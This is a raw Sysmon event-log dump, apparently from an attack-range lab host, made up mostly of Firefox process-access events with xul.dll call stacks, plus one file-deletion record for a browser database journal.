Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105061Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105060Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105059Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105058Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105057Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105056Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105055Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105054Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105053Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105052Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+e48ccc|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278 10341000x8000000000000000105051Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+e48c43|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff 10341000x8000000000000000105050Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.152{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+c2e55|C:\Program Files\Mozilla Firefox\xul.dll+e4891a|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7 10341000x8000000000000000105049Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0942f|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+166d71b|C:\Program Files\Mozilla Firefox\xul.dll+19cd045|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105048Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-journalMD5=83E7CB2DBF516EB3D8F9E114240E3B7A,SHA256=A5B77CD37FD4E143C40BF4F296179815ECB6FB638CABC066DB85751591C71F88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105047Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105046Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105045Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105044Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105043Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105042Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.136{58E9C193-B422-615A-0602-00000000FC01}55524268C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+2f07d|C:\Program Files\Mozilla Firefox\firefox.exe+2e285|C:\Program Files\Mozilla Firefox\xul.dll+1fd1d9a|C:\Program 